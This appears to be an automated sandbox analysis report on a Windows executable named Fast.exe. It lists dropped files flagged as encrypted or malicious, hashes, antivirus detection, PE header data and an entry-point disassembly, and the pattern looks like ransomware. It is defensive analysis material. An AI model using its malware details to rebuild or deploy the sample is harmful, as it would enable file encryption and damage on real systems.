    SHA1:314B067126069ED8E3ABEE109E7CA341FC7B0CD7
    SHA-256:33F54F9FDF30628C499D5D7764B5087FCA78E132A96F55F13D5DFBC8E2C138ED
    SHA-512:652578417A5C363D919228F3D78B09C2E4D62D168966A5541A358B8AA98FFC5C251785846B14C560BFB224EE9B1E9E98A2F3A1E566E1A8F329FC25890AF9908F
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):38098
    Entropy (8bit):7.995069545175516
    Encrypted:true
    SSDEEP:768:CZNTl2HN4Xskgxnf/7qdASCq1FIk3rYyIdK/xaam9Ox3MzuKQ:b0skKguq1SRyIiaF9M3muKQ
    MD5:3CAC91A77B2F34ABB4BCF521F705295F
    SHA1:BEAD4D92DA9EEDBFED8BAD39FA3253424F2D03AB
    SHA-256:DF88472627232F945298239F7BE0B658B6A05AE029096E40FD538A05D8D98B0E
    SHA-512:44BDC4FD2ED77B905BB11896B1D52ED20B5C0BF1FC5B3ACC846D562B226730D1510A0D140C42E4624043C8759ED2719DC5D2215D68AE9BB5C7F00329D17A4648
    Malicious:true
    Preview:V.$...kX.(.J....&...&'`.....ZPB.=W..0...n..eA...F..56....).spX../..D..J....A.7..J.._y..1Ofo...7....r9....1}.......2...[.5.#qr[_G...[{NM..C........G)..E......+.9n....t.....N.4.}...].S....x.D....~..v>.,{(k..TywL.Y.q..)...Z.C.(h..Pu...e..+.......2)Z..vZ...R....y....5V)Q.r|...._...4,]?n.,.,:....CE67_.. ..:..6o.....J..,.../.I!.y.&fU2?Qj.M1.G....>./[`(..V'm..He.BV.?#.S..x....d.jwKo~+....dMt.O?d....qH..8z...K.,......._.....x.GGBs.W....Z..k....|..w...AW...9.q$.`...1G@._2]4...bk....w.)....^....PfX\...Vy(....iz..T.].;L...S..m.\....8......7..e.v....-3.7.....K..)P.i.F.......%#...T...5..j.TQ.1....{..6......5l`.....=k...<b. .. DzU)h.~...`b.;6E....`.....L...z.>..c.>..M./A..}.o...&.B...6f..X........oq..I.'.l. J......>......VV5..L.M...,............L`.e,j....y...g..S..E-....s...b............X._.lmQ..8>..I<pq..bQ.....^.._.k.=t+Q.....%*#...h0.>)...fL....+.'Z..i.Z.I.9w..2}.~.Ah.d..O..lt..8}j. N.ra..:...z]?a.l.V........r....{..'.....l..](..L.6s0.e..S.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):19413738
    Entropy (8bit):7.3529351495456
    Encrypted:false
    SSDEEP:196608:58IPbmmLjUK/8HWzt8mQ9IShtSqFEFnoTybF2iGgrAfK4aL:CInPkWzt8V9ISh4o2J25fVQ
    MD5:9700DD4AB44F91A3E21ACAF87111B453
    SHA1:350AB069A708362377FF66437B70EFB8536BCBBC
    SHA-256:D5119A3041555F3C72F39FCA6AC800AEF6FB95DF070DA436A080D8D3DE21A355
    SHA-512:0FF651FF7E2302A1FBB967D0DEC9AC1D4B70E03BEAF99B3B80AF6399E797025329AF7309BAD7766EA2A84E2CAA78E7E5002614EDE68579258703DA73586C176D
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:OpenPGP Public Key
    Category:dropped
    Size (bytes):67234
    Entropy (8bit):7.997105009985587
    Encrypted:true
    SSDEEP:1536:TZoJT0U1kVjukZxaXhPDgzxq4yLb1LDaeOew3npm2z86VPXQ:TZoJgVjukZxa16xq4sb1383Y2Y6VvQ
    MD5:02F522160E610707046D3530216EFA63
    SHA1:41F46D16E5430346D07EF3F48E0FF1281F7FBCD8
    SHA-256:5B17A768DD4AB9CDE2DC0603B7450DED691319A8D2819960C7356F4A1D10FEE6
    SHA-512:3069816DC6DA3C3DD95A41E6F94D8E1423497F8850CD09F0A57A4D7ED05B751B29DAA4C8CF5A50FA43752DF8146DBB781F9FF4E1C2BD872DAA67237469E62219
    Malicious:true
    Preview:...Z..!6..+P.....]e...=.$O.R.j....D/...o.W..S.&..`Wo....9.E.Y.......m.t.J...F,...~..$G.+..pS7.JVE....nZ.I..V:..T"cK..F.O.z..!Q!W.".O-.Y....0../..g.v....1.9.f.v.].#..P..n...........H..S^M...w.....A..,.w.o..R...BK[......../+....\l...?..*.m.-..I..:.."4$../.f.._.I.H.....vc..(..T).@...@.&..d.q..xP..fm...6.D<.m.h.B..g.5=.9....?4.*.l....S..(!...x.:.......4.1./..S1..[...[...n@Z...9..=...L........,......#1g.......|.r.D.......\...}_......jF]._>Z).g^....`.......>(I@".K.Lw..w...j..,{...$.y..;.qz.]...G>.:...m.A.............[........Da.xzt....,*..Is.D5`.3.....\....J..h..s..8.xH....Cw*..4..=.3.b....K..R*.e..>/.gC...*.w Io3...pD..N.5g.R...G.hr.N.h....oq.f....A....2f8.bB.Ok.4Y...X..y...a.. ...T>.M,.[M....".5P]..d*...4...3*......|.QY7.+....B....q{N...l.>'Q.a...#l.......6..c.NQU..wF.....=Q..:..c..%...5....../[g.....A=......4u..G..a.BZ.`..H..D...<....)...s...(....G+.uM.......^....m.".$.....Gi.....}.....P....n\ ...'.IzT......I..H.Q......L..dWfz...~...I....Z.~.u.;.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):658
    Entropy (8bit):7.568945530823676
    Encrypted:false
    SSDEEP:12:2B56ACEg/mDcyGYZbIRMND1wb1Uhe6mlVgcV90oyl1U0GbwaBm39Z:2DgsIYlIyNJSU8F3gM0oyl1NKYZ
    MD5:D121DA7C21792F1DFBEB0E58A234B71A
    SHA1:E98BEAC3463176B2E63BF68CBE5D7871F968A9FF
    SHA-256:95DC969CC761A659F600E0DAFDF85CF0BBC31D0D49AFC1060B13C910C8C4F09E
    SHA-512:E104C1CD4A1DF51FBFF8A7AA0C021594241432F90AE5853149B5ABA763836B1AC64AD921A2102CC9E761580C43FF1D71C1A0EE7D3264A5B40A919A355B6A9987
    Malicious:false
    Preview:...H...o.8.6.b....T...x.|...).]p.%.L..y.m..YKb.-.q>.fx(+.u....@./...,...5.J...2.'".........pr..b.....{.78....C.F].o..MJ..Z!....x......a..Y.....u.1}N......^......$.tr.....t.v;{........-....0!..6.<...;.iW.8.B..?.2RY.b;...o.l82l............r<C...y.....!..1{..]!..2.)H....a..D.:'=d.'m.....TDE>D1..s.'. /...b..%....o....^..$.)....6._.....a]..k.+N.B}.A...U.<.G.....v...:............KE._.<..u..3...E3.SL.iU.Y.* n.c.<.W...z.~4.+(p..:...n(.%..*.D.NE...4&.<d.K....]..i`t..........................%S.2bQ.{D......I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:OpenPGP Secret Key
    Category:dropped
    Size (bytes):42706
    Entropy (8bit):7.995636369283413
    Encrypted:true
    SSDEEP:768:vPxgIGOU7Cpnb0fw9lVcyV2w4DTl3e2LK0Jlww3z+cbnAemLv/F9ShScyWIZYPCp:XxeCpnkslVcyoweu2O0rwwD+fT71WIZj
    MD5:972CDF1A6237A6499E25F62CE24BA02C
    SHA1:B5BB86206CDE691F2FD1C0CE0CE7400B371971F3
    SHA-256:2A387BBADADBD991820F95F61126F8B696E4B80E4DFA72DA9CD3C6C44B285BC3
    SHA-512:BAB1ED7028803DF24B9357A7FB5317367230F7B22EB6E6B362B2E28C019AE1B02206E9970C8EBAB3C414D76219B9B77D2C6736387F12AD97CE9285DC935FEADE
    Malicious:true
    Preview:...3`d..tnlG..2./....D&`-.e...K.....A..Zq....f...d.....;..E0:..$..#k..Y..Jl...=....4...C.AH.*.&.+b"w'.E.....|*.3.-..-j.db...8+d..VF..h.=.3W..S~..z..D.H.j.._n(z../.........1.. 0.q.2`..s8....=N2.x......qp..m.....F b... /A..V..\....Zn.j....\e.'..g....f.y8...R.=eUI....q=.@[..p.....n%...c. .._].....Ez..d....;..z.v..D....h..T5"..1. ..P9ha. 8o.W..,.e1..l..Dmv....j.g.S..}..K.].,f.F6..j*..Z .k2.I.g./.........;.C.....M..).G.. ..(.,_...7.?.z...\.+...{.....1*..?..V....K..2...9.D.R..'./.U.Y.Y.....md.P.<..f........G.. .5..&AJ-+...P.9..M^......,...Vr.L..k8......}.%.9?. ...S%..E.F{..%E...Q.-|L._...n....F]rV-..;........%....>..?.J..f..:o......OMR.7... ...e.p.^....^].BAr{\;<L9........(~j'.}$.C.$...r.i#.B..m..^=..AIj#..8......5g.ze..@Q0s*....Z<........7n..{..|;/..s. .k.^.........Q..T...uw..>...H.do.1...,....T.n..._ .#F.Vbs........\...15.....J....?.b...{.....<..)h.X...7O..ui........tR....j.8..4L.i.IU.]..=....&..T=..q....Xd.Y..N..h..}e..9.!.....vo.W........vM
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):4368602
    Entropy (8bit):5.716704282680897
    Encrypted:false
    SSDEEP:49152:cC0nNc/RcYHCY9AwqdHIEogMAYrukdUmSC+bXMZQU1QqpqAMfJG+sqCbMNNmU2bk:iEIzHIEWOlANqLNNmU2bKd
    MD5:C4CFD637796F48181218C30D2A48A786
    SHA1:E19FCFCCB226E2E75E59B60934F95E779A562E13
    SHA-256:C485260137AAEC25F25342742F52A91FD6AF764B11CB41CC9BE9F5D1EE1DF601
    SHA-512:BC2ACC5C7E37E4AA99387DCC1ECA747A1B12BFB9BDE0B61E5C05A4BA041DA27317D66CE9CB2B834B2109C785E58B3A999EF6334BA1B4C4FC83ECE65B44E751E4
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):27298
    Entropy (8bit):7.9943410527205625
    Encrypted:true
    SSDEEP:768:7Fwt9RWZ3qG59w83qGS4EdU89nLywYHPQfevJ:76QbqGS4Eq81YvmevJ
    MD5:4D2A030E35144BCD6B46C6D6C3EAE512
    SHA1:BB94C82454F7BD45A3CB1FF83387132C5DF7E478
    SHA-256:BD18BCBFD9693BA04E9ED9A97E01A39D85B6FF96A096AFA992F24D092A2BD7F8
    SHA-512:DD48C146755AE548BDB3ED39A735A1DDCC2B0D7620959BC220A555FBEE172199D34ADA4A984C36612EFB95C7767B82A44F308B90B23702BE25F49A3393C74A76
    Malicious:true
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1938
    Entropy (8bit):7.8958403376788
    Encrypted:false
    SSDEEP:48:T61Aic7S4c1LKyBTzx7y3AajvI28offHQ8OfE8DZQ:T6Jh4csyhVy+28AHIfdQ
    MD5:E199C779FFBF3054B9FAE0AA696057C2
    SHA1:8F2D4460920315A6D831FB2A415B5B76E845CBC9
    SHA-256:74081A339B5524B33C7EF5EA525E19837D932E73969F068584F7A9D9B29FA3E0
    SHA-512:8673BCD6FB69C80D4C681F54ACD7E6B8852DAFC5475C31F2FF458BC42B8D96DECEB2C444A237669E2EF0346691B5067D29D8130597D78C0A65D28329788BE7F5
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):60160266
    Entropy (8bit):7.980080643287468
    Encrypted:false
    SSDEEP:1572864:/Qb5m2CYw2bheyHA2DiAaNqCPiQwm9tqGWS15Vj9QVqd2+NAs6:IXhwMhe6AAaPiQwF6xQ22R/
    MD5:33B746B3C4C4BDFA030B5EC2AE9E2325
    SHA1:BF7E51777D860CD9A2F4A7B1FE9FCC149D75B633
    SHA-256:8A2BDEECA37C9C15DEE3C6689855432ABA16C8C399A2FC4C9C99730D306E9D67
    SHA-512:86D0D33857D47E630FC652DB99D2B513D43E1C1D7C9620F528B00BA2912597EFFBE15352E967295DDD91492F83615C4281F0154E6D7CC38DD6E99DD09EA864CA
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):614866
    Entropy (8bit):7.999676046735325
    Encrypted:true
    SSDEEP:12288:i6qQsbs29Ib84PJ8MNC1uyAKo5taTSqBIXuGd6m7uS4XrRKeT:iksb+dPJ3NC1uyAKo5DqBKuGcm7OXrR1
    MD5:BBEB8F7E4AA2A233D545367F1D6A4F7A
    SHA1:A924C40FF12F05927977CE9C417D469E9C984580
    SHA-256:7D68CC39E3BA9CD3607DE9FD6B9CDBA3CA4AB38FFFABC6236E306A2A93079CA4
    SHA-512:846AC7F5B19DCE73539D9555476B8231E13FAF7E119C80D38BDD527CDA66564438720AD7DD9FE9823730172CDDEA88004B335FD9D2B89C877838D695792CCC3D
    Malicious:true
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):918770
    Entropy (8bit):7.9997950005877305
    Encrypted:true
    SSDEEP:24576:xaWt5dvOQhMiETLgzAHFfMDfMTkfLKvle4ud:xvfNOuRAFMKkzKv4t
    MD5:4C1EF90F150B046F5C0393AFA2E7B41E
    SHA1:E3ED5C7C4B940B01C4C9E11ADC3679CD5E951B2D
    SHA-256:1ADFCA1B7654805089C7A1CBFEF629EEDF20F97A52A4BFB34C45C13A8655AB19
    SHA-512:B640DE29C99AEFAABA89FDAB38CA032807F503E553CC2DBA6F2EB0587B301905A976FEC9431E0F17D40BD1CE98DFBEF57F41B2ED6ED0280C4DB2D85381F9685D
    Malicious:true
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1224402
    Entropy (8bit):7.999862909779432
    Encrypted:true
    SSDEEP:24576:NOzgXa4eNpJKFzzOYH9nvgpHCtdAna78NNO/KvqF14p6VKQMNDd:NOzU9VCYH9nYpH8dyag/AyKu
    MD5:CF922F997AFBEAD03593D2BBCA1CD470
    SHA1:9DBE9DBFF3696B5716E87C86C2B57371FFD00514
    SHA-256:1F340C4F69C922A471E522036961B582C3B0154D287581125F478040F65F65E6
    SHA-512:14AE022749CD29633BC7ED63564735F19EB0802DE830AF93081AB5EA61BD82FA8FEB1514CD6DE652F1149B42A6CF1CA73E010879901631686CD028179589755C
    Malicious:true
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11237730
    Entropy (8bit):6.160250363707686
    Encrypted:false
    SSDEEP:196608:RzwSv9AAyNe6liXUxCGZHa93Whlw6ZRnVM:aKlyNTliXUxCGZHa93Whlw6ZRn2
    MD5:68968B94B7DEDD37CF33719BB92F05FD
    SHA1:B30713D8861F80748E06C7293D7A34FC2397D9C5
    SHA-256:3C663F41BAE89FF684F914B8E77D2C7DC5EA5E72F823191D23F72D24FF217DBE
    SHA-512:7EA92227F39F00EEAB4C999F3FBEB41463C7FD1319FC03CED43C4C8F687C2526820F65E4DB81DF2515B5A650F4450F013BF91F8370BCDF2DA3BECB32FF4D8370
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):177411282
    Entropy (8bit):6.662609199289216
    Encrypted:false
    SSDEEP:1572864:NqyTOaliwnJRMpKLDZli4ozxIejTz2u9Mlk/jBfg3GH5gVtTck:t2JgVKk
    MD5:73897DE902436737870737B812685AED
    SHA1:7E3A6A1114D3D7DF290604F401E4AF8693A8A7CF
    SHA-256:DEED3963DB7C6BDC59A56FAAEAEC49FB4877DC89713C1E1ED7E656413A72E0A4
    SHA-512:786DF1712FC6BAB79DA838DA55AC096E5A03F71AE188580C15C15F8B9331A5A90695DE3491CAD1D9A728C785AE8596E7937832E4D61D7AD4A8931DDFFD400683
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):341202
    Entropy (8bit):7.999517398827045
    Encrypted:true
    SSDEEP:6144:bAVFXvmyIcEQ5VvI/9D+eJz+n3vvxZHkmzlgxZDHNG1xe7SL4X:bq7XO6K+33Am8HNQM7SL4X
    MD5:62F3872CFC67BD62BCBB6B7DAE79C424
    SHA1:70AAE46405356FC6A94C895BCD06B9DED89420A3
    SHA-256:3BB66944E720CB07423D42126056E76FFAE184F2C71EC8E19EAB256D76E5FB3C
    SHA-512:FD3AB35D8BBD444B989741F55A46DA216259CC2ED8E6CCE03C4C0FB54A0ADD855EE1CE4BB846F9BE0E88D4FC85A83B1F5CE858A86FC99605551CDAEE3A38F51E
    Malicious:true
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8207566
    Entropy (8bit):7.651165989995995
    Encrypted:false
    SSDEEP:196608:Qi9AF4cC5G0p3m18orDhYVskrDIleMPXW2897:QU64v8w+BOVskrDlMPXCN
    MD5:FF2C703D483E7768C1B187D4DD337B8E
    SHA1:B2C041EA968A34002E259DA9C6B901D23F6412A1
    SHA-256:69E49D5B1DEBA95A0D96C40F0C7B3D57CD5FAA83C633162B9902D798BEDEDFEB
    SHA-512:1B2E97EB5E5238387DB2A6410E76FD12758A5AAC76E56C0436C77B319E8A565257CC0FF69C99F6922690D0AA97786DA5B2BC7C96FF8021D239BC0761BAEF3F8F
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):415394
    Entropy (8bit):7.9995772406046255
    Encrypted:true
    SSDEEP:6144:woeZABPgZtgzVmRNVcYaQaWWi66faEOu6ehm+VMFw2O7hkdrjeSZk8AfPHI70sdb:wbZmeghAKFu6ehEF672t4fO00F5yk
    MD5:1770BAAF3D4351A46C95C7A886F5A5B0
    SHA1:FD04A7B2E1BBA274DB0DB1D85C33E8605E419029
    SHA-256:8D9D7A6FCCA383B9F1E858CAE774CD72DA956E20572C8D003C81BAB4A6893117
    SHA-512:6EFA73B2BBF86391177076B4ABD3CA8D58BA8F00E05616DF47B09544A587066F081269099F14310460638932CAB176D6E47998FD717ECCF1E7DED119876C1DE9
    Malicious:true
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15106
    Entropy (8bit):7.987626465576231
    Encrypted:false
    SSDEEP:384:uaDK/ygsI6eDJGDfn3isfsXz6pFloOOWB7VzEl6Q:1KEvM4Tn3isfA6RuW9VQl6Q
    MD5:3F6914EDE9FE7E693F8892FD85C30803
    SHA1:143902C07564628A9A98266C1D6B7CD302F4C3B3
    SHA-256:9474FDFF3019274939828444653F9418CCB07A458E2A6715295C8F85D032C9AD
    SHA-512:DB63B5325EDF22A856D061CB0B4F976566CDF66DBA0E028ECB5EE2852604A78916245B44DC7C9BF33A0C17DB17FA1F9B69FEBE217E2526953DC2F2595E51A73A
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:OpenPGP Public Key
    Category:dropped
    Size (bytes):15106
    Entropy (8bit):7.988143377257791
    Encrypted:false
    SSDEEP:384:daYVXz9B0NwyrfB87jXyhMLL033DjWntnF+pc4sCJbdAsyU7Sd4GaQ:UYBz9mNwMp8HXya03GntnYlsCJbesyU2
    MD5:B6563F9F27A22F66D82AFC1DF6A65749
    SHA1:DB3AC2487EC042A8FB8C89E9AD494D0136A1A66A
    SHA-256:3834F6890BAE5E33D5D5B314511F30B9E4A5AFE24D50F41961917F4190DD1DAE
    SHA-512:554D950814F5E5A5D49378D3F9BE9DC1A6ADF4054EE91E3CE22F1DEE7DC6109B5198B34A4A7D4E50DB5B0BBB56A1FAEA8C88581E81EC99AC7C84D1A8D0DFB096
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):723170
    Entropy (8bit):7.999720408407077
    Encrypted:true
    SSDEEP:12288:Ew3E+FuE1rkl9bNyNKVjakSf7zjfqTHsprP7aEHPu+mQzMrqF+:vyXUKpaD73qTMpr+EHmqz8j
    MD5:18F1B72387031A7CBA855664BDC45594
    SHA1:639443B85A791B929403E14D079CF0DA31BE657B
    SHA-256:1FD2CA6CD571E843DB63719352B6DEFF5CA98BF5D22FFE995FD0FB24F6F90F14
    SHA-512:6C6C210A0431A04AC62CA851BE385F0E86E3835F45D82930B3EF3E9EF0EACB6248343C3C5FED1BB8FFD31AE498DD9326A3B8283E87ECFB3A0214BFD069950B6C
    Malicious:true
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):4989666
    Entropy (8bit):5.951265195823128
    Encrypted:false
    SSDEEP:49152:pZhlPMtYgEMf0i8P/O3O6SQkknVI2EHuhv5UqHI1mbzF7+uMvtcgky7Rrn+Qqt01:jPU7aHA/M8y7RozUUHLf1oYe
    MD5:1E3A79C584F59BA2449A6ECB01864365
    SHA1:2C17842CE6EA74B78B1A755A6EB30FEF0F8387FC
    SHA-256:54A10C93040966AE963FF82BFBC6191C8DED13EBF9CD1CE84FB8F74667E29518
    SHA-512:3DBADFD7B134F46802829056D58544E7A266A35EF3781021037DBA12788708C2E37C00AD0D19219F25D1C0A7A2E7CD29E70F8DCAB3A16D04FE96D70F239EBFF6
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):56832
    Entropy (8bit):7.07249253388244
    Encrypted:false
    SSDEEP:1536:ENeRBl5PT/rx1mzwRMSTdLpJVIVAxN/0nVS12:EQRrmzwR5JiWxNIJ
    MD5:EA6D3083F8C1C506FBFF457BF09A7ED8
    SHA1:F159C4FC7D13571E725F0AE9E0749C77CF859B4E
    SHA-256:000DB71531E5AA8B30594D305BB3FBCE8E2C71F66E2170091EF58B3C1F306F46
    SHA-512:1167B9EBE03C399C5915394592F97CE60BD07E92F589A4A0D794255C7A9C46423DD28EFBF96B45AAB6A67763A20676627F35683CC6790BF1383C7F07B6E28405
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 89%
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*..A*..A*..A#.TA+..A#.DA9..A*..AE..A1GIA+..A1G}A+..A1GyA8..A1GJA+..ARich*..A................PE..L....P.^.....................>......./............@..........................0............@.................................4........................................................................................................................text............................... ..`.rdata..|...........................@..@.data....&..........................@....reloc..............................@..B.cdata...7.......8..................@...........................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:3:ggPYV:rPYV
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:false
    Preview:[ZoneTransfer]....ZoneId=0
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):56832
    Entropy (8bit):7.07249253388244
    Encrypted:false
    SSDEEP:1536:ENeRBl5PT/rx1mzwRMSTdLpJVIVAxN/0nVS12:EQRrmzwR5JiWxNIJ
    MD5:EA6D3083F8C1C506FBFF457BF09A7ED8
    SHA1:F159C4FC7D13571E725F0AE9E0749C77CF859B4E
    SHA-256:000DB71531E5AA8B30594D305BB3FBCE8E2C71F66E2170091EF58B3C1F306F46
    SHA-512:1167B9EBE03C399C5915394592F97CE60BD07E92F589A4A0D794255C7A9C46423DD28EFBF96B45AAB6A67763A20676627F35683CC6790BF1383C7F07B6E28405
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 89%
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*..A*..A*..A#.TA+..A#.DA9..A*..AE..A1GIA+..A1G}A+..A1GyA8..A1GJA+..ARich*..A................PE..L....P.^.....................>......./............@..........................0............@.................................4........................................................................................................................text............................... ..`.rdata..|...........................@..@.data....&..........................@....reloc..............................@..B.cdata...7.......8..................@...........................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:ASCII text, with CRLF line terminators
    Category:modified
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:3:ggPYV:rPYV
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:false
    Preview:[ZoneTransfer]....ZoneId=0
    Process:C:\Windows\System32\wbadmin.exe
    File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "\374'\201\202"
    Category:dropped
    Size (bytes):30720
    Entropy (8bit):1.7838103642799872
    Encrypted:false
    SSDEEP:96:z/mMWnTSHuPt2azvAdeaEdsb/8pRbWb5FTOzNZJJd5:5WTIuPt2azvAgVu7OxZJJd5
    MD5:1B79EC8F44B9BE6458C7AC0DC6F69B17
    SHA1:6A70985915CF83974C8984969881D087B0F40BF4
    SHA-256:5FFBA9F9B70FFAC7CED3E205A6D90DE347BB9C8DCC9F2344633A367C12B0829C
    SHA-512:6E50000B1E67E336836F09C322F43318850A3661FE8149A23A54E030A82C9325322E7979EC23D03E5B7E07827335F6EE36903F228EDF271F47E2CCCEE731FE8C
    Malicious:false
    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):7.07249253388244
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:Fast.exe
    File size:56'832 bytes
    MD5:ea6d3083f8c1c506fbff457bf09a7ed8
    SHA1:f159c4fc7d13571e725f0ae9e0749c77cf859b4e
    SHA256:000db71531e5aa8b30594d305bb3fbce8e2c71f66e2170091ef58b3c1f306f46
    SHA512:1167b9ebe03c399c5915394592f97ce60bd07e92f589a4a0d794255c7a9c46423dd28efbf96b45aab6a67763a20676627f35683cc6790bf1383c7f07b6e28405
    SSDEEP:1536:ENeRBl5PT/rx1mzwRMSTdLpJVIVAxN/0nVS12:EQRrmzwR5JiWxNIJ
    TLSH:B643AF06706A40B2CDB18570293A6F5F8FBF910144B498478F294EDA3FD5572E72A3BA
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*..A*..A*..A#.TA+..A#.DA9..A*..AE..A1GIA+..A1G}A+..A1GyA8..A1GJA+..ARich*..A................PE..L....P.^...................
    Icon Hash:90cececece8e8eb0
    Entrypoint:0x402fa7
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp:0x5E8350F5 [Tue Mar 31 14:17:25 2020 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:1
    File Version Major:5
    File Version Minor:1
    Subsystem Version Major:5
    Subsystem Version Minor:1
    Import Hash:851a0ba8fbb71710075bdfe6dcef92eb
    Instruction
    call 00007F77B4E147FEh
    push 00000000h
    call dword ptr [0040A06Ch]
    int3
    push ebp
    mov ebp, esp
    push ecx
    push 00000000h
    push dword ptr [ebp+08h]
    call 00007F77B4E18139h
    pop ecx
    pop ecx
    pop ecx
    pop ebp
    ret
    push ebp
    mov ebp, esp
    push esi
    push edi
    push dword ptr [ebp+0Ch]
    call 00007F77B4E1AEA6h
    push 0000005Ch
    push dword ptr [ebp+0Ch]
    call 00007F77B4E1AF0Fh
    mov edi, eax
    add esp, 0Ch
    test edi, edi
    je 00007F77B4E14DB5h
    add edi, 02h
    mov eax, dword ptr [ebp+08h]
    mov esi, dword ptr [eax+0Ch]
    test esi, esi
    je 00007F77B4E14DD6h
    push dword ptr [ebp+0Ch]
    mov edx, esi
    call 00007F77B4E154C7h
    pop ecx
    test eax, eax
    jns 00007F77B4E14DC3h
    test edi, edi
    je 00007F77B4E14DC3h
    push edi
    mov edx, esi
    call 00007F77B4E154B6h
    pop ecx
    test eax, eax
    js 00007F77B4E14DB6h
    xor eax, eax
    jmp 00007F77B4E14DB5h
    xor eax, eax
    inc eax
    pop edi
    pop esi
    pop ebp
    ret
    push ebp
    mov ebp, esp
    push ebx
    push esi
    push 0000005Ch
    push dword ptr [ebp+08h]
    call 00007F77B4E1AEBFh
    mov ebx, eax
    pop ecx
    pop ecx
    test ebx, ebx
    je 00007F77B4E14DCBh
    inc ebx
    inc ebx
    je 00007F77B4E14DC7h
    push 0000002Eh
    push ebx
    call 00007F77B4E1AEABh
    mov esi, eax
    pop ecx
    pop ecx
    test esi, esi
    je 00007F77B4E14DB9h
    add esi, 02h
    jmp 00007F77B4E14DB4h
    xor esi, esi
    mov edx, dword ptr [edi]
    test edx, edx
    je 00007F77B4E14DC1h
    test esi, esi
    je 00007F77B4E14DFAh
    push esi
    call 00007F77B4E15464h
    pop ecx
    test eax, eax
    js 00007F77B4E14DEFh
    mov edx, dword ptr [edi+04h]
    test edx, edx
    je 00007F77B4E14DC1h
    Programming Language:
    • [ C ] VS2008 SP1 build 30729
